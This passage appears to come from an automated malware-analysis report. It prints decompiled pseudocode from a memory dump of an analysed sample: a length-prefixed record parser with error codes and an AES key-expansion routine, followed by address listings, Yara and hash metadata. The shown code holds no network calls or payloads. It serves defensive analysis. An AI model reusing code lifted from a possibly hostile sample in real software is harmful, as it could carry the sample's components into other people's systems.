												_t274 = L00418A30(_t375);
												_t275 = _v60;
												if(_t274 != 0) {
													_t275 = _t275 +  *((intOrPtr*)(_t375 + 0x300));
													_v60 = _t275;
												}
												 *(_t375 + 0x318) = 5;
												 *_a4 = _t275;
											}
											goto L120;
										}
										if( *(_t482 + 0x36c) >= 0x80) {
											if( *((intOrPtr*)(_t375 + 0x227)) == _t449 && ( *(_t375 + 0x308) & 0x00000030) == 0x10) {
												_t486 =  ==  ? 0xfffffe7f : _t486;
											}
											_t292 =  *((intOrPtr*)(_t375 + 0x228));
											if(_t292 == _t449 || _t292 == 3 &&  *((char*)(_t375 + 0x22b)) == 0) {
												_t486 =  ==  ? 0xfffffe81 : _t486;
											}
										}
										if(( *(_t482 + 0x36d) & _t449) != 0) {
											if(( *(_t375 + 0x308) & 0x00000030) != 0x10) {
												_t486 =  ==  ? 0xfffffe7e : _t486;
											} else {
												if(( *(_t482 + 0x31c) & 0x00000003) == 0) {
													_t486 = 0xfffffe7e;
												}
											}
										}
										if(_t389 == 0) {
											 *(_t375 + 0x30a) =  *(_t375 + 0x30a) | 0x00002000;
											if(( *(_t375 + 0x308) & 0x00000080) == 0) {
												_t286 =  *((intOrPtr*)(_t375 + 0xf8));
												if( *((intOrPtr*)(_t375 + 0xf8)) != 0) {
													if( *((intOrPtr*)(_t482 + 0x24)) == 0) {
														L00419FE5( *((intOrPtr*)(_t482 + 0x7c)), _t286);
														_t486 =  ==  ? 0xfffffebe : _t486;
													} else {
														_push(_t389);
														if(E0041A08D(_t286) != 1) {
															_t486 = 0xfffffebe;
														}
													}
												}
											}
											if( *((intOrPtr*)(_t482 + 0x1c)) != 0x206) {
												goto L103;
											} else {
												_v28 = _v28 & 0x00000000;
												_t280 = _t375 + 0x37c;
												_t399 =  *_t280;
												if( *_t280 != 0) {
													if( *((char*)(_t375 + 0x382)) == 0) {
														L96:
														_t281 = E00426383( *_t482,  &_v28,  *_t280,  *((intOrPtr*)(_t482 + 4)));
														if(_t281 != 0) {
															L98:
															_t486 = 0xfffffeaa;
															L99:
															if(_t486 == 0 &&  *((char*)(_t375 + 0x382)) != 0 && ( *(_t375 + 0x308) & 0x00000080) == 0) {
																L0042990C( *((intOrPtr*)(_t375 + 0x37c)));
																_t486 =  <  ? 0xfffffe66 : _t486;
															}
															goto L103;
														}
														 *((char*)(_t375 + 0x382)) = _t281 + 1;
														goto L99;
													}
													_t285 = L004196A9(_t375, _t399);
													 *((char*)(_t375 + 0x382)) = 0;
													L94:
													if(_t285 != 0) {
														goto L98;
													}
													_t280 = _t375 + 0x37c;
													goto L96;
												}
												_push(_t280);
												_t454 = 0x25;
												_t285 = L00419618(_t454);
												goto L94;
											}
										} else {
											 *(_t375 + 0x1f0) = _t486;
											goto L120;
										}
									} else {
										goto L120;
									}
								}
								_v44 = _v44 & _t486;
								_t486 = E0041A2E3(_t375,  &_v72, _t387,  !(( *(_t375 + 0x308) & 0x0000ffff) >> 7) & _t447,  &_v28,  &_v24);
								if(_t486 != 0) {
									if(_t486 == 0xffffff74 || _t486 == 0xffffff7c) {
										_t482 = _v64;
										_t449 = 1;
										_v34 = _v34 | 1;
									} else {
										_t482 = _v64;
										_t449 = 1;
										if( *((intOrPtr*)(_t375 + 0x80)) == 0) {
											_v34 = _v34 | 1;
										} else {
											_v34 = _v34 ^ (_v34 >> 0x00000001 ^ _v34) & 1;
										}
									}
									goto L65;
								}
								_t482 = _v64;
								_t448 = 0;
								if((_v34 & 0x00000002) == 0) {
									_v34 = _v34 & 0x0000fffe;
									goto L64;
								} else {
									_t486 = _v40;
									_t449 = 1;
									_v34 = _v34 | 1;
									goto L65;
								}
							} else {
								do {
									_v44 = _v48 - 1;
									_t318 = E0041A2E3(_t375,  &_v72, _t387,  !(( *(_t375 + 0x308) & 0x0000ffff) >> 7) & _t447,  &_v28,  &_v24);
									_t493 = _t493 + 0x10;
									if(_t318 == 0) {
										_t318 = E0041A3C0(_t375,  &_v72);
									}
									_t486 = E0041A146( *((intOrPtr*)( *_t375 + 0x50)), _t375, _t318,  &_v72);
									_t321 =  *(_t375 + 0x308) & 0x00000080;
									if(_t321 != 0 && (_t486 == 0xfffffe96 || _t486 == 0xfffffe97)) {
										 *(_t375 + 0x1f0) =  *(_t375 + 0x1f0) & 0x00000000;
										_t486 = 0;
									}
									_t482 = _v64;
									if(_t486 != 0) {
										L45:
										if(( *(_t375 + 0x308) & 0x00000080) == 0) {
											E0041A0E7(_t375, _t486);
										}
										 *(_t375 + 0x1f0) = _t486;
										if(_v40 == 0) {
											_v40 = _t486;
											_t486 = 0;
										}
										goto L49;
									}
									if(( *(_t482 + 0x36c) & 0x00000010) != 0 && _t321 == 0 && _v24 == 0) {
										_v20 = _v20 & 0x00000000;
										_t486 = L00425FF8( &_v20,  *((intOrPtr*)(_v72 + 4 + _v44 * 8)), 5,  *((intOrPtr*)(_t375 + 0x84)));
										if(_t486 < 0) {
											goto L120;
										}
										L00431DF0( *_v20,  *((intOrPtr*)(_v72 + _v44 * 8)),  *((intOrPtr*)(_v72 + 4 + _v44 * 8)));
										_t493 = _t493 + 0xc;
										_t486 =  ==  ? 0 : L0041C49B( *((intOrPtr*)( *_t375 + 0x50)),  &_v20, 2, 0);
										if(_t486 == 0) {
											goto L49;
										}
										goto L45;
									}
									L49:
									_t387 = _t482;
									L00423BB3(_t482);
									_v34 = _v34 & 0x0000fffb;
									_t447 = 1;
									_t326 = _v48 - 1;
									_v48 = _t326;
								} while (_t326 > 1);
								goto L50;
							}
						}
						if(( *(_t375 + 0x30c) & 0x00002000) != 0) {
							L28:
							if(( *(_t375 + 0x308) & 0x00000030) == 0) {
								_t486 = 0xfffffea7;
								E0041A0E7(_t375, 0xfffffea7);
							}
							goto L30;
						}
						if(( *(_t375 + 0x308) & 0x00000100) == 0) {
							goto L30;
						}
						_t338 = L00418A14( *(_t375 + 0x218) & 0x0000ffff);
						_t492 = _t492 + 4;
						if(_t338 == 0) {
							goto L30;
						}
						goto L28;
					}
					L14:
					L14:
					if(_t385 >= ( *(_t375 + 0x20e) & 0x000000ff) || _t385 >= 9) {
						_t486 = 0xfffffe90;
					} else {
						goto L16;
					}
					goto L120;
					L16:
					if(_t481 - _t445 + 3 > _a8) {
						goto L2;
					}
					L004189B4(_t481 + _v12,  &_v20);
					_t483 = _t481 + 3;
					_v60 = _t483;
					if(_v20 - _v56 + _t483 > _a8) {
						goto L2;
					}
					_t436 = _v52;
					 *((intOrPtr*)(_v72 + 4 + _t436 * 8)) = _v20;
					_t481 = _t483 + _v20;
					_v60 = _t481;
					 *((intOrPtr*)(_v72 + _t436 * 8)) = _v12 + _t483;
					_t445 = _v56;
					_t350 = 0xfffffffd;
					_v16 = _v16 + _t350 - _v20;
					if( *(_t375 + 0x308) < 0x8000) {
						L23:
						_t385 = _t436 + 1;
						_v52 = _t385;
						if(_v16 != 0) {
							goto L14;
						}
						goto L24;
					}
					if(_t481 - _t445 + 2 > _a8) {
						goto L2;
					}
					_t488 = _v12;
					L004189CE(_t481 + _t488,  &_v8);
					_t484 = _t481 + 2;
					_v60 = _t484;
					if((_v8 & 0x0000ffff) - _v56 + _t484 > _a8) {
						goto L2;
					}
					_t438 = _v52;
					_t475 = _v68;
					 *(_t475 + 4 + _t438 * 8) = _v8 & 0x0000ffff;
					_t489 = _v8 & 0x0000ffff;
					 *((intOrPtr*)(_t475 + _t438 * 8)) = _t484 + _t488;
					_t481 = _t484 + _t489;
					_t362 = 0xfffffffe;
					_v60 = _t481;
					_v16 = _v16 + _t362 - _t489;
					_t486 = L0041EF4B(_t375,  *((intOrPtr*)(_t475 + _t438 * 8)), _t497,  *(_t475 + 4 + _t438 * 8) & 0x0000ffff, 0xb, 0);
					_t492 = _t492 + 0xc;
					if(_t486 < 0) {
						goto L120;
					} else {
						_t436 = _v52;
						_t445 = _v56;
						goto L23;
					}
				}
				if(_t480 - _t379 + 1 <= _a8) {
					_t370 =  *((intOrPtr*)(_t480 + _v12));
					_t485 = _t480 + 1;
					_v7 = _t370;
					_t371 = _t370 & 0x000000ff;
					_v20 = _t371;
					_v60 = _t485;
					if(_t371 - _t379 + _t485 > _a8) {
						goto L2;
					}
					if((_t442 & 0x00000030) != 0x10 || _v7 == 0) {
						_t480 = _t485 + _v20;
						_push(0x48);
						_v60 = _t480;
						_t374 = L0042D5FA();
						_v68 = _t374;
						if(_t374 != 0) {
							goto L9;
						}
						goto L8;
					} else {
						_t486 = 0xfffffe5c;
						goto L120;
					}
				}
				goto L2;
			}





































































                              0x0041a401
                              0x0041a403
                              0x0041a40d
                              0x0041a40e
                              0x0041a415
                              0x0041a417
                              0x0041a417
                              0x0041a419
                              0x0041a41f
                              0x0041a422
                              0x0041a428
                              0x0041a42f
                              0x0041a432
                              0x0041a434
                              0x0041a43a
                              0x0041a4a1
                              0x0041a4a1
                              0x0041a4a4
                              0x0041a4a9
                              0x0041a4ae
                              0x0041a499
                              0x0041a49b
                              0x0041ab3a
                              0x0041ab3d
                              0x0041ab44
                              0x0041ab51
                              0x0041ab51
                              0x0041a4b5
                              0x0041a4bc
                              0x0041a4c8
                              0x0041a446
                              0x0041a446
                              0x00000000
                              0x0041a446
                              0x0041a4d7
                              0x0041a4dc
                              0x0041a4df
                              0x0041a4e2
                              0x0041a4e5
                              0x0041a4ee
                              0x00000000
                              0x00000000
                              0x0041a4f4
                              0x0041a500
                              0x00000000
                              0x00000000
                              0x0041a508
                              0x0041a50b
                              0x0041a62a
                              0x0041a62a
                              0x0041a633
                              0x0041a638
                              0x0041a67c
                              0x0041a686
                              0x0041a68f
                              0x0041a691
                              0x0041a696
                              0x00000000
                              0x00000000
                              0x0041a6a4
                              0x0041a6a9
                              0x0041a6ae
                              0x0041a6af
                              0x0041a6b2
                              0x0041a6ba
                              0x0041a81c
                              0x0041a81e
                              0x00000000
                              0x00000000
                              0x0041a824
                              0x0041a82e
                              0x0041a8cd
                              0x0041a8cf
                              0x0041a8cf
                              0x0041a8d0
                              0x0041a8d3
                              0x0041a8d5
                              0x0041a8d8
                              0x0041a8e6
                              0x0041a8ed
                              0x0041aa8f
                              0x0041aa94
                              0x0041aaa2
                              0x0041aaa9
                              0x0041aaad
                              0x0041aaad
                              0x0041aac3
                              0x0041aac5
                              0x0041aacf
                              0x0041aad5
                              0x0041aae7
                              0x0041aaee
                              0x0041aaee
                              0x0041aaf2
                              0x0041ab0e
                              0x0041ab10
                              0x0041ab10
                              0x0041aaf4
                              0x0041aaf7
                              0x0041aafd
                              0x0041aafd
                              0x0041ab02
                              0x0041ab02
                              0x0041ab19
                              0x0041ab20
                              0x0041ab23
                              0x0041ab25
                              0x0041ab2b
                              0x0041ab2b
                              0x0041ab31
                              0x0041ab38
                              0x0041ab38
                              0x00000000
                              0x0041aa94
                              0x0041a8fe
                              0x0041a906
                              0x0041a920
                              0x0041a920
                              0x0041a923
                              0x0041a92b
                              0x0041a94a
                              0x0041a94a
                              0x0041a92b
                              0x0041a953
                              0x0041a95f
                              0x0041a97d
                              0x0041a961
                              0x0041a968
                              0x0041a96a
                              0x0041a96a
                              0x0041a968
                              0x0041a95f
                              0x0041a983
                              0x0041a995
                              0x0041a9a7
                              0x0041a9a9
                              0x0041a9b1
                              0x0041a9b7
                              0x0041a9d9
                              0x0041a9e6
                              0x0041a9b9
                              0x0041a9b9
                              0x0041a9c9
                              0x0041a9cb
                              0x0041a9cb
                              0x0041a9c9
                              0x0041a9b7
                              0x0041a9b1
                              0x0041a9f0
                              0x00000000
                              0x0041a9f6
                              0x0041a9f6
                              0x0041a9fa
                              0x0041aa00
                              0x0041aa04
                              0x0041aa1a
                              0x0041aa36
                              0x0041aa40
                              0x0041aa49
                              0x0041aa54
                              0x0041aa54
                              0x0041aa59
                              0x0041aa5b
                              0x0041aa79
                              0x0041aa8c
                              0x0041aa8c
                              0x00000000
                              0x0041aa5b
                              0x0041aa4c
                              0x00000000
                              0x0041aa4c
                              0x0041aa1f
                              0x0041aa24
                              0x0041aa2b
                              0x0041aa2e
                              0x00000000
                              0x00000000
                              0x0041aa30
                              0x00000000
                              0x0041aa30
                              0x0041aa06
                              0x0041aa09
                              0x0041aa0c
                              0x00000000
                              0x0041aa0c
                              0x0041a985
                              0x0041a985
                              0x00000000
                              0x0041a985
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0041a8d8
                              0x0041a834
                              0x0041a859
                              0x0041a860
                              0x0041a892
                              0x0041a8c1
                              0x0041a8c6
                              0x0041a8c7
                              0x0041a89c
                              0x0041a89c
                              0x0041a8a1
                              0x0041a8a9
                              0x0041a8bb
                              0x0041a8ab
                              0x0041a8b5
                              0x0041a8b5
                              0x0041a8a9
                              0x00000000
                              0x0041a892
                              0x0041a862
                              0x0041a865
                              0x0041a86b
                              0x0041a886
                              0x00000000
                              0x0041a86d
                              0x0041a86d
                              0x0041a870
                              0x0041a871
                              0x00000000
                              0x0041a871
                              0x0041a6c8
                              0x0041a6c8
                              0x0041a6cc
                              0x0041a6ec
                              0x0041a6f1
                              0x0041a6f6
                              0x0041a6fd
                              0x0041a6fd
                              0x0041a715
                              0x0041a723
                              0x0041a726
                              0x0041a738
                              0x0041a73f
                              0x0041a73f
                              0x0041a741
                              0x0041a746
                              0x0041a7d3
                              0x0041a7de
                              0x0041a7e4
                              0x0041a7e4
                              0x0041a7ed
                              0x0041a7f3
                              0x0041a7f5
                              0x0041a7f8
                              0x0041a7f8
                              0x00000000
                              0x0041a7f3
                              0x0041a753
                              0x0041a77b
                              0x0041a78a
                              0x0041a790
                              0x00000000
                              0x00000000
                              0x0041a7a8
                              0x0041a7b2
                              0x0041a7cb
                              0x0041a7d1
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0041a7d1
                              0x0041a7fa
                              0x0041a7fa
                              0x0041a7fc
                              0x0041a808
                              0x0041a80c
                              0x0041a810
                              0x0041a811
                              0x0041a814
                              0x00000000
                              0x0041a6c8
                              0x0041a6ba
                              0x0041a641
                              0x0041a665
                              0x0041a66c
                              0x0041a66e
                              0x0041a677
                              0x0041a677
                              0x00000000
                              0x0041a66c
                              0x0041a64f
                              0x00000000
                              0x00000000
                              0x0041a659
                              0x0041a65e
                              0x0041a663
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0041a663
                              0x00000000
                              0x0041a511
                              0x0041a51a
                              0x0041a877
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0041a529
                              0x0041a533
                              0x00000000
                              0x00000000
                              0x0041a542
                              0x0041a54a
                              0x0041a552
                              0x0041a558
                              0x00000000
                              0x00000000
                              0x0041a55e
                              0x0041a569
                              0x0041a575
                              0x0041a578
                              0x0041a57b
                              0x0041a57e
                              0x0041a581
                              0x0041a585
                              0x0041a594
                              0x0041a61c
                              0x0041a61c
                              0x0041a621
                              0x0041a624
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0041a624
                              0x0041a5a4
                              0x00000000
                              0x00000000
                              0x0041a5aa
                              0x0041a5b3
                              0x0041a5bc
                              0x0041a5c4
                              0x0041a5ca
                              0x00000000
                              0x00000000
                              0x0041a5d0
                              0x0041a5d3
                              0x0041a5dc
                              0x0041a5e3
                              0x0041a5e7
                              0x0041a5ea
                              0x0041a5ec
                              0x0041a5ef
                              0x0041a5f2
                              0x0041a609
                              0x0041a60b
                              0x0041a610
                              0x00000000
                              0x0041a616
                              0x0041a616
                              0x0041a619
                              0x00000000
                              0x0041a619
                              0x0041a610
                              0x0041a444
                              0x0041a453
                              0x0041a456
                              0x0041a457
                              0x0041a45a
                              0x0041a45d
                              0x0041a464
                              0x0041a46a
                              0x00000000
                              0x00000000
                              0x0041a472
                              0x0041a484
                              0x0041a487
                              0x0041a48a
                              0x0041a48d
                              0x0041a492
                              0x0041a497
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0041a47a
                              0x0041a47a
                              0x00000000
                              0x0041a47a
                              0x0041a472
                              0x00000000

                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b2f124d830bc3c61cdf6e8695b7cf3497e9befc8d3840a918b6d32a3028062dc
                              • Instruction ID: 3ba6e254b7f2d4c2766406d12400661e9b1fdfca9830f8b749eaf033f3ce6608
                              • Opcode Fuzzy Hash: b2f124d830bc3c61cdf6e8695b7cf3497e9befc8d3840a918b6d32a3028062dc
                              • Instruction Fuzzy Hash: 3222F331A022099BCF15CF68C4807FEB7B5AF44314F18816BEC559B382D7389E91CB9A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0042220F, Relevance: .4, Instructions: 411COMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 99%
                              			E0042220F(signed int* __ecx, void* __edx, unsigned int _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int* _v8;
				signed int _t250;
				signed int _t267;
				void* _t270;
				intOrPtr _t314;
				signed int _t330;
				signed int _t351;
				signed int _t369;
				signed int _t387;
				signed int _t406;
				signed int _t413;
				signed char* _t414;
				signed int _t425;
				signed int _t427;
				signed int _t431;
				intOrPtr _t455;
				signed int _t459;
				signed int _t461;
				signed int _t464;
				signed int _t467;
				signed int _t469;
				signed int _t470;
				signed int _t473;
				signed int _t476;
				signed int _t482;
				intOrPtr* _t493;
				signed int _t500;
				signed int _t506;
				signed int _t513;
				signed int _t519;
				signed int _t525;
				unsigned int _t527;
				signed int* _t528;
				void* _t530;
				intOrPtr* _t532;
				signed int* _t534;
				signed int* _t535;
				signed int* _t537;
				void* _t538;
				intOrPtr _t539;
				void* _t541;
				void* _t542;
				void* _t543;

				_push(__ecx);
				_t527 = _a4;
				_t537 = __ecx;
				_v8 = __ecx;
				 *(__ecx + 0xf4) = _t527;
				 *((intOrPtr*)(__ecx + 0xf0)) = (_t527 >> 2) + 6;
				L00431DF0(__ecx, __edx, _t527);
				L00421C07(_t537, _t537, _t527);
				if(_t527 == 0x10) {
					_t476 = _t537[3];
					_t528 =  &(_t537[1]);
					_t425 = ( *(0x4621e8 + (_t476 >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x461de8 + (_t476 >> 0x18) * 4) & 0x000000ff ^  *(0x4625e8 + (_t476 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4619e8 + (_t476 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t537;
					_t537[4] = _t425;
					_t250 =  *_t528 ^ _t425;
					_t427 = _t537[2] ^ _t250;
					_t537[5] = _t250;
					_t537[6] = _t427;
					_t537[7] = _t427 ^ _t476;
					_t538 = 4;
					do {
						_t528 =  &(_t528[4]);
						_t429 = _t528[2];
						_t122 = _t538 + 0x4609bc; // 0x2000000
						_t538 = _t538 + 4;
						_t482 =  *(0x461de8 + (_t528[2] >> 0x18) * 4) & 0x000000ff ^  *(0x4625e8 + (_t528[2] >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4621e8 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x4619e8 + (_t429 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t122 ^  *(_t528 - 4);
						_t528[3] = _t482;
						_t267 =  *_t528 ^ _t482;
						_t528[4] = _t267;
						_t431 = _t528[1] ^ _t267;
						_t528[5] = _t431;
						_t528[6] = _t528[2] ^ _t431;
					} while (_t538 != 0x28);
					goto L12;
				} else {
					if(_t527 == 0x18) {
						_t457 = _t537[5];
						_t534 =  &(_t537[0xa]);
						_t500 = ( *(0x4621e8 + (_t537[5] >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x461de8 + (_t457 >> 0x18) * 4) & 0x000000ff ^  *(0x4625e8 + (_t457 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4619e8 + (_t457 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t537;
						_t330 = _t537[1] ^ _t500;
						_t537[6] = _t500;
						_t537[7] = _t330;
						_t459 = _t537[2] ^ _t330;
						_t537[8] = _t459;
						_t537[9] = _t537[3] ^ _t459;
						_t542 = 4;
						do {
							_t461 =  *(_t534 - 0x18) ^  *(_t534 - 4);
							 *_t534 = _t461;
							_t534[1] =  *(_t534 - 0x14) ^ _t461;
							_t534 =  &(_t534[6]);
							_t462 =  *(_t534 - 0x14);
							_t88 = _t542 + 0x4609bc; // 0x2000000
							_t542 = _t542 + 4;
							_t506 =  *(0x461de8 + ( *(_t534 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x4625e8 + ( *(_t534 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4621e8 + (_t462 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x4619e8 + (_t462 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t88 ^  *(_t534 - 0x28);
							 *(_t534 - 0x10) = _t506;
							_t351 =  *(_t534 - 0x24) ^ _t506;
							 *(_t534 - 0xc) = _t351;
							_t464 =  *(_t534 - 0x20) ^ _t351;
							 *(_t534 - 8) = _t464;
							 *(_t534 - 4) =  *(_t534 - 0x1c) ^ _t464;
						} while (_t542 != 0x20);
						goto L12;
					} else {
						if(_t527 == 0x20) {
							_t465 = _t537[7];
							_t535 =  &(_t537[0xc]);
							_t513 = ( *(0x4621e8 + (_t537[7] >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x461de8 + (_t465 >> 0x18) * 4) & 0x000000ff ^  *(0x4625e8 + (_t465 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4619e8 + (_t465 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t537;
							_t369 = _t537[1] ^ _t513;
							_t537[8] = _t513;
							_t537[9] = _t369;
							_t467 = _t537[2] ^ _t369;
							_t537[0xa] = _t467;
							_t537[0xb] = _t537[3] ^ _t467;
							_t543 = 4;
							do {
								_t468 =  *(_t535 - 4);
								_t469 =  *(_t535 - 0x18);
								_t519 =  *(0x4625e8 + ( *(_t535 - 4) >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4621e8 + ( *(_t535 - 4) >> 0x18) * 4) & 0xff000000 ^  *(0x4619e8 + (_t468 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x461de8 + (_t468 & 0x000000ff) * 4) & 0x000000ff ^  *(_t535 - 0x20);
								_t387 =  *(_t535 - 0x1c) ^ _t519;
								 *_t535 = _t519;
								_t535[1] = _t387;
								_t535 =  &(_t535[8]);
								_t470 = _t469 ^ _t387;
								 *(_t535 - 0x18) = _t470;
								 *(_t535 - 0x14) =  *(_t535 - 0x34) ^ _t470;
								_t471 =  *(_t535 - 0x14);
								_t48 = _t543 + 0x4609bc; // 0x2000000
								_t543 = _t543 + 4;
								_t525 =  *(0x461de8 + ( *(_t535 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x4625e8 + ( *(_t535 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4621e8 + (_t471 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x4619e8 + (_t471 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t48 ^  *(_t535 - 0x30);
								 *(_t535 - 0x10) = _t525;
								_t406 =  *(_t535 - 0x2c) ^ _t525;
								 *(_t535 - 0xc) = _t406;
								_t473 =  *(_t535 - 0x28) ^ _t406;
								 *(_t535 - 8) = _t473;
								 *(_t535 - 4) =  *(_t535 - 0x24) ^ _t473;
							} while (_t543 != 0x1c);
							L12:
							_t539 = _v8;
							_t530 = 1;
							if(_a12 == 1) {
								_t413 =  *(_t539 + 0xf0) << 2;
								if(_t413 != 0) {
									_t493 = _t539 + (_t413 + 2) * 4;
									_t532 = _t539 + 8;
									_t541 = 0;
									do {
										_t541 = _t541 + 4;
										_t413 = _t413 - 4;
										 *((intOrPtr*)(_t532 - 8)) =  *((intOrPtr*)(_t493 - 8));
										 *((intOrPtr*)(_t493 - 8)) =  *((intOrPtr*)(_t532 - 8));
										 *((intOrPtr*)(_t532 - 4)) =  *((intOrPtr*)(_t493 - 4));
										 *((intOrPtr*)(_t493 - 4)) =  *((intOrPtr*)(_t532 - 4));
										_t455 =  *_t532;
										 *_t532 =  *_t493;
										_t532 = _t532 + 0x10;
										_t314 =  *((intOrPtr*)(_t493 + 4));
										 *_t493 = _t455;
										_t493 = _t493 - 0x10;
										 *((intOrPtr*)(_t532 - 0xc)) = _t314;
										 *((intOrPtr*)(_t493 + 0x14)) =  *((intOrPtr*)(_t532 - 0xc));
									} while (_t541 < _t413);
									_t539 = _v8;
									_t530 = 1;
								}
								if( *(_t539 + 0xf0) > _t530) {
									_t414 = _t539 + 8;
									do {
										_t414 =  &(_t414[0x10]);
										_t484 =  *(_t414 - 8);
										_t486 =  *(_t414 - 4);
										 *(_t414 - 8) =  *(0x4609e8 + ( *(0x461de8 + ( *(_t414 - 8) >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x460de8 + ( *(0x461de8 + ( *(_t414 - 8) >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4611e8 + ( *(0x461de8 + (_t484 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4615e8 + ( *(0x461de8 + ( *(_t414 - 8) & 0x000000ff) * 4) & 0x000000ff) * 4);
										_t488 =  *_t414;
										 *(_t414 - 4) =  *(0x4609e8 + ( *(0x461de8 + ( *(_t414 - 4) >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x460de8 + ( *(0x461de8 + ( *(_t414 - 4) >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4611e8 + ( *(0x461de8 + (_t486 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4615e8 + ( *(0x461de8 + ( *(_t414 - 4) & 0x000000ff) * 4) & 0x000000ff) * 4);
										_t490 = _t414[4];
										 *_t414 =  *(0x4609e8 + ( *(0x461de8 + ( *_t414 >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x460de8 + ( *(0x461de8 + ( *_t414 >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4611e8 + ( *(0x461de8 + (_t488 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4615e8 + ( *(0x461de8 + ( *_t414 & 0x000000ff) * 4) & 0x000000ff) * 4);
										_t530 = _t530 + 1;
										_t414[4] =  *(0x4609e8 + ( *(0x461de8 + (_t414[4] >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x460de8 + ( *(0x461de8 + (_t414[4] >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4611e8 + ( *(0x461de8 + (_t490 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4615e8 + ( *(0x461de8 + (_t414[4] & 0x000000ff) * 4) & 0x000000ff) * 4);
									} while (_t530 <  *(_t539 + 0xf0));
								}
							}
							_t270 = L00422806(_t539, _a8);
						} else {
							_t270 = 0xffffff53;
						}
					}
				}
				return _t270;
			}














































                              0x00422212
                              0x00422216
                              0x00422219
                              0x0042221d
                              0x00422228
                              0x0042222f
                              0x00422235
                              0x0042223f
                              0x0042224a
                              0x004224d4
                              0x004224d7
                              0x00422530
                              0x00422532
                              0x00422535
                              0x0042253a
                              0x0042253c
                              0x0042253f
                              0x00422544
                              0x00422547
                              0x00422548
                              0x00422548
                              0x0042254b
                              0x00422595
                              0x0042259b
                              0x0042259e
                              0x004225a1
                              0x004225a6
                              0x004225a8
                              0x004225ae
                              0x004225b0
                              0x004225b8
                              0x004225bb
                              0x00000000
                              0x00422250
                              0x00422253
                              0x004223ca
                              0x004223cd
                              0x0042242a
                              0x0042242c
                              0x0042242e
                              0x00422431
                              0x00422434
                              0x0042243b
                              0x0042243e
                              0x00422441
                              0x00422442
                              0x00422445
                              0x0042244d
                              0x0042244f
                              0x00422452
                              0x00422455
                              0x0042249f
                              0x004224a5
                              0x004224a8
                              0x004224ab
                              0x004224b1
                              0x004224b3
                              0x004224b9
                              0x004224bb
                              0x004224c3
                              0x004224c6
                              0x00000000
                              0x00422259
                              0x0042225c
                              0x00422268
                              0x0042226b
                              0x004222c8
                              0x004222ca
                              0x004222cc
                              0x004222cf
                              0x004222d2
                              0x004222d9
                              0x004222dc
                              0x004222df
                              0x004222e0
                              0x004222e0
                              0x00422321
                              0x00422331
                              0x00422334
                              0x00422336
                              0x00422338
                              0x0042233b
                              0x0042233e
                              0x00422345
                              0x00422348
                              0x0042234b
                              0x00422395
                              0x0042239b
                              0x0042239e
                              0x004223a1
                              0x004223a7
                              0x004223a9
                              0x004223af
                              0x004223b1
                              0x004223b9
                              0x004223bc
                              0x004225c0
                              0x004225c0
                              0x004225c5
                              0x004225c9
                              0x004225d5
                              0x004225da
                              0x004225df
                              0x004225e2
                              0x004225e5
                              0x004225e7
                              0x004225ea
                              0x004225f0
                              0x004225f3
                              0x004225f9
                              0x004225ff
                              0x00422604
                              0x00422607
                              0x00422609
                              0x0042260b
                              0x0042260e
                              0x00422611
                              0x00422613
                              0x00422619
                              0x0042261c
                              0x0042261f
                              0x00422623
                              0x00422628
                              0x00422628
                              0x0042262f
                              0x00422635
                              0x00422638
                              0x00422638
                              0x0042263b
                              0x0042266f
                              0x00422699
                              0x004226c8
                              0x004226f1
                              0x00422720
                              0x00422749
                              0x00422799
                              0x0042279a
                              0x0042279d
                              0x00422638
                              0x0042262f
